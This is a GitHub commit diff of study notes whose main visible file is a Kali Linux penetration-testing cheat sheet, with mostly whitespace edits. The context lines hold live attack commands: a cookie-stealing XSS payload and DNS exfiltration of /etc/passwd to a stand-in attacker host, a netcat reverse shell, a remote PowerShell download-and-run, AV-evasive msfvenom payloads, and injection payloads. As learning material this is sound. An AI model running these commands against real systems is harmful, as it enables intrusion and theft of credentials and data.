Skip to content

Commit 3d549f3

Browse files
committed
added Experimental design page from private to public check
1 parent 8f5ec45 commit 3d549f3

13 files changed

+6357
-189
lines changed

pages/.net framework %2F .net core.md

Lines changed: 0 additions & 3 deletions
This file was deleted.

pages/.net framework.md

Lines changed: 0 additions & 3 deletions
This file was deleted.

pages/Cybersecurity Architecture.md

Lines changed: 407 additions & 0 deletions
Large diffs are not rendered by default.

pages/Cybersecurity.md

Lines changed: 787 additions & 26 deletions
Large diffs are not rendered by default.

pages/Ethical Hacking Advanced.md

Lines changed: 718 additions & 0 deletions
Large diffs are not rendered by default.

pages/Free Assets.md

Lines changed: 106 additions & 97 deletions
Large diffs are not rendered by default.

pages/Kali Linux.md

Lines changed: 47 additions & 47 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
---
1+
---
22
seoTitle: Kali Linux Complete Guide – Penetration Testing, Tools & Commands
33
description: "Comprehensive Kali Linux reference covering installation, Linux fundamentals, shell commands, networking, user management, penetration testing tools, Metasploit, Nmap, Wireshark, Burp Suite, and ethical hacking workflows."
44
keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, Wireshark, Burp Suite, wireless security, security tools, cybersecurity, Linux commands, kali linux tutorial, kali linux guide, kali linux notes, VR-Rathod, Code-Note, code note vr, vr book"
@@ -18,7 +18,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
1818
- BackTrack had architectural limitations and was hard to maintain.
1919
- Goal: FHS-compliant, properly packaged, enterprise-grade free platform for security professionals.
2020
- Used by: pentesters, CTF players, security researchers, law enforcement, students.
21-
21+
-
2222
- # Introduction
2323
collapsed:: true
2424
- ## What is Kali Linux?
@@ -37,7 +37,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
3737
Kali Linux Cloud → AWS, Azure, GCP images
3838
Kali Linux Undercover → Looks like Windows 10
3939
```
40-
40+
-
4141
- # Installation & Setup
4242
collapsed:: true
4343
- ## System Requirements
@@ -65,7 +65,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
6565
5. passwd root → enter new password
6666
6. exec /sbin/init
6767
```
68-
68+
-
6969
- # Kernel & Architecture
7070
collapsed:: true
7171
- ## What is the Kernel?
@@ -125,7 +125,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
125125
s Socket (IPC network communication)
126126
p Named pipe (FIFO) (IPC between processes)
127127
```
128-
128+
-
129129
- # Shell & Terminal
130130
collapsed:: true
131131
- ## Shell Types
@@ -169,7 +169,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
169169
- ```
170170
Format: -rwxrwxrwx (owner group others)
171171
r=4 w=2 x=1 → 7=rwx 6=rw- 5=r-x 4=r-- 0=---
172-
172+
173173
chmod 755 script.sh # owner:rwx group:r-x others:r-x
174174
chmod 644 file.txt # owner:rw- group:r-- others:r--
175175
chmod 600 id_rsa # owner:rw- only (SSH key)
@@ -240,21 +240,21 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
240240
name="Kali"
241241
echo "Hello, $name"
242242
read -p "Enter name: " username
243-
243+
244244
if [ $age -ge 18 ]; then echo "Adult"
245245
elif [ $age -ge 13 ]; then echo "Teen"
246246
else echo "Child"; fi
247-
247+
248248
for i in {1..5}; do echo $i; done
249-
249+
250250
while [ $count -lt 10 ]; do echo $count; ((count++)); done
251-
251+
252252
greet() { echo "Hello, $1"; }
253253
greet "World"
254-
254+
255255
command; if [ $? -eq 0 ]; then echo "OK"; else echo "Fail"; fi
256256
```
257-
257+
-
258258
- # Process Management
259259
collapsed:: true
260260
- ## Viewing & Controlling Processes
@@ -290,7 +290,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
290290
cat /proc/meminfo # detailed memory
291291
dmidecode # hardware info from BIOS
292292
```
293-
293+
-
294294
- # Systemd & Service Management
295295
collapsed:: true
296296
- ## systemctl
@@ -319,14 +319,14 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
319319
/var/log/dpkg.log → package install history
320320
/var/log/apache2/ → web server logs
321321
/var/log/fail2ban.log → blocked IPs
322-
322+
323323
grep "Failed password" /var/log/auth.log # failed SSH
324324
grep "Accepted" /var/log/auth.log # successful SSH
325325
last # login history
326326
lastb # failed login attempts
327327
lastlog # last login all users
328328
```
329-
329+
-
330330
- # User & Group Management
331331
collapsed:: true
332332
- ## User Commands
@@ -360,7 +360,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
360360
gpasswd -d user group # remove from group
361361
groups username # show user's groups
362362
```
363-
363+
-
364364
- # Package Management
365365
collapsed:: true
366366
- ## APT Commands
@@ -391,7 +391,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
391391
kali-tools-sniffing-spoofing sniffing
392392
kali-tools-social-engineering SET etc
393393
```
394-
394+
-
395395
- # Disk & Storage Management
396396
collapsed:: true
397397
- ## Disk Info & Partitioning
@@ -422,7 +422,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
422422
chmod 600 /swapfile && mkswap /swapfile && swapon /swapfile
423423
echo '/swapfile none swap sw 0 0' >> /etc/fstab
424424
```
425-
425+
-
426426
- # Networking
427427
collapsed:: true
428428
- ## Network Info
@@ -476,7 +476,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
476476
ufw enable / ufw status
477477
ufw allow 22 / ufw allow 80/tcp / ufw deny 23
478478
```
479-
479+
-
480480
- # Penetration Testing Methodology
481481
collapsed:: true
482482
- ## Phases
@@ -489,7 +489,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
489489
```
490490
- ## Legal Rules
491491
- NEVER test without written permission. Get signed Rules of Engagement. Stay in scope. Practice on VulnHub, HackTheBox, TryHackMe.
492-
492+
-
493493
- # Information Gathering
494494
collapsed:: true
495495
- ## Nmap
@@ -527,7 +527,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
527527
# Recon-ng: web reconnaissance framework
528528
recon-ng # launch recon-ng
529529
```
530-
530+
-
531531
- # Service Enumeration
532532
collapsed:: true
533533
- ## SMB / Samba
@@ -547,35 +547,35 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
547547
nmap -p 21 --script ftp-anon target
548548
ftp target # anonymous: user=anonymous pass=email
549549
hydra -l admin -P rockyou.txt ftp://target
550-
550+
551551
# SNMP (UDP 161)
552552
nmap -sU -p 161 --script snmp-info,snmp-brute target
553553
snmpwalk -c public -v2c target
554554
onesixtyone -c community-strings.txt target
555-
555+
556556
# LDAP (port 389)
557557
nmap -p 389 --script ldap-search target
558558
ldapsearch -x -H ldap://target -b "dc=domain,dc=com"
559-
559+
560560
# NFS (port 2049)
561561
showmount -e target # show NFS exports
562562
mount -t nfs target:/share /mnt/nfs
563-
563+
564564
# MySQL (3306) / MSSQL (1433)
565565
nmap -p 3306 --script mysql-info,mysql-enum target
566566
mysql -h target -u root -p
567567
nmap -p 1433 --script ms-sql-info target
568568
impacket-mssqlclient sa:password@target
569569
```
570-
570+
-
571571
- # Vulnerability Scanning
572572
collapsed:: true
573573
- ## Nikto & OpenVAS
574574
- ```bash
575575
nikto -h http://target.com # web server scan
576576
nikto -h http://target.com -ssl -p 8443 # HTTPS custom port
577577
nikto -h http://target.com -o report.html -Format html
578-
578+
579579
apt install gvm && gvm-setup && gvm-start # OpenVAS setup
580580
# Web UI: https://127.0.0.1:9392
581581
```
@@ -587,7 +587,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
587587
searchsploit -m 12345 # copy to current dir
588588
searchsploit --update # update database
589589
```
590-
590+
-
591591
- # Exploitation Tools
592592
collapsed:: true
593593
- ## Metasploit Framework
@@ -602,7 +602,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
602602
set LPORT 4444
603603
set PAYLOAD windows/x64/meterpreter/reverse_tcp
604604
check / run
605-
605+
606606
# Meterpreter post-exploitation
607607
sysinfo / getuid / getsystem # info / user / privesc
608608
hashdump # dump password hashes
@@ -626,7 +626,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
626626
# Encoded (AV evasion)
627627
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o enc.exe
628628
```
629-
629+
-
630630
- # Password Attacks
631631
collapsed:: true
632632
- ## John the Ripper
@@ -660,7 +660,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
660660
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
661661
cewl http://target.com -w wordlist.txt # scrape site for words
662662
```
663-
663+
-
664664
- # Web Application Testing
665665
collapsed:: true
666666
- ## Burp Suite
@@ -698,32 +698,32 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
698698
SQL Injection:
699699
' '' ' OR 1=1-- admin'-- ' UNION SELECT NULL,NULL--
700700
Time-based: ' AND SLEEP(5)--
701-
701+
702702
XSS:
703703
<script>alert(1)</script>
704704
<img src=x onerror=alert(1)>
705705
<svg onload=alert(1)>
706706
Cookie steal: <script>document.location='http://attacker/?c='+document.cookie</script>
707-
707+
708708
LFI:
709709
?page=../../../../etc/passwd
710710
?page=php://filter/convert.base64-encode/resource=index.php
711711
Log poisoning: inject PHP in User-Agent → include log file
712-
712+
713713
Command Injection:
714714
; id | id && id `id` $(id)
715715
Blind: ; sleep 5 ; ping -c5 attacker.com
716-
716+
717717
SSRF:
718718
url=http://127.0.0.1/
719719
url=http://169.254.169.254/latest/meta-data/ (AWS)
720-
720+
721721
XXE:
722722
<?xml version="1.0"?>
723723
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
724724
<root>&xxe;</root>
725725
```
726-
726+
-
727727
- # Network Sniffing & Analysis
728728
collapsed:: true
729729
- ## Wireshark
@@ -758,7 +758,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
758758
# Victim nc: nc attacker 4444 -e /bin/bash
759759
# File transfer: nc -lvp 4444 > file | nc host 4444 < file
760760
```
761-
761+
-
762762
- # Wireless Security
763763
collapsed:: true
764764
- ## Aircrack-ng Suite
@@ -785,7 +785,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
785785
# Configure hostapd-wpe.conf with SSID matching target
786786
hostapd-wpe hostapd-wpe.conf
787787
```
788-
788+
-
789789
- # Privilege Escalation
790790
collapsed:: true
791791
- ## Linux PrivEsc
@@ -812,7 +812,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
812812
# Automated: WinPEAS
813813
IEX(New-Object Net.WebClient).downloadString('http://attacker/winPEAS.ps1')
814814
```
815-
815+
-
816816
- # Post-Exploitation & Persistence
817817
collapsed:: true
818818
- ## Linux Persistence
@@ -870,7 +870,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
870870
# DNS exfil: encode data in DNS queries
871871
cat /etc/passwd | xxd -p | while read l; do dig $l.attacker.com; done
872872
```
873-
873+
-
874874
- # Forensics & Steganography
875875
collapsed:: true
876876
- ## Disk Forensics
@@ -894,7 +894,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
894894
exiftool -all= image.jpg # strip all metadata
895895
zsteg image.png # detect hidden data in PNG
896896
```
897-
897+
-
898898
- # Reverse Engineering
899899
collapsed:: true
900900
- ## Static Analysis
@@ -936,7 +936,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
936936
VV # visual graph mode
937937
iz # strings in data section
938938
```
939-
939+
-
940940
- # Anonymity & Evasion
941941
collapsed:: true
942942
- ## Tor & Proxychains
@@ -974,7 +974,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
974974
apt install shellter && shellter
975975
# Check detection: https://antiscan.me (NOT VirusTotal for ops)
976976
```
977-
977+
-
978978
- # Cryptography Tools
979979
collapsed:: true
980980
- ## Hash Identification
@@ -1002,7 +1002,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
10021002
gpg --decrypt file.txt.gpg > file.txt
10031003
gpg --sign file.txt && gpg --verify file.txt.gpg
10041004
```
1005-
1005+
-
10061006
- # Social Engineering Tools
10071007
collapsed:: true
10081008
- ## SET — Social Engineering Toolkit
@@ -1022,7 +1022,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
10221022
# Workflow: Sending Profile → Email Template → Landing Page → User Group → Launch Campaign
10231023
# Tracks: opens, clicks, submitted credentials
10241024
```
1025-
1025+
-
10261026
- # More Learn
10271027
- ## Official Resources
10281028
- [Kali Linux Official Docs](https://www.kali.org/docs/)
@@ -1053,4 +1053,4 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
10531053
- [Kali Linux Full Course – NetworkChuck 🐧](https://www.youtube.com/watch?v=lZAoFs75_cs)
10541054
- [Ethical Hacking Full Course – freeCodeCamp 🔐](https://www.youtube.com/watch?v=3Kq1MIfTWCE)
10551055
- [TryHackMe Walkthroughs – John Hammond 🎯](https://www.youtube.com/@JohnHammond)
1056-
- [IppSec – HackTheBox Walkthroughs](https://www.youtube.com/@ippsec)
1056+
- [IppSec – HackTheBox Walkthroughs](https://www.youtube.com/@ippsec)

0 commit comments

Comments
 (0)